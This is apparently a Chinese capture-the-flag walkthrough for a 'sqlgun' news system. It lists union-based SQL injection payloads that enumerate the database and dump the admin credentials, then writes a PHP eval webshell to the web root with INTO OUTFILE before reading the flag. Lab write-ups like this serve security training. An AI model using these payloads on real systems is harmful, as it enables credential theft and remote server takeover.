sqlgun新闻管理系统

一，打开主页

1.输入框测试回显点

-1'union select 1,2,3#

出现回显点2

2.查看数据库表名

-1'union select 1,database(),3#

3.查看表名

-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'#

4.查看admin中的列名

-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='sqlgunnews' and table_name='admin'#

5.查看admin的账号密码

-1'union select 1,2,group_concat(id,admin,password) from admin#

二，MD5解密一下得出结果为admin

三，扫描了一下发现有一个phpinfo.php文件访问一下

1.我们来看一下里面有没有有用的信息

获得绝对路径

四，写入一句话木马我们来访问1.php

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/1.php' #

五，蚁剑连接

1.在根目录找到flag

2.点击flag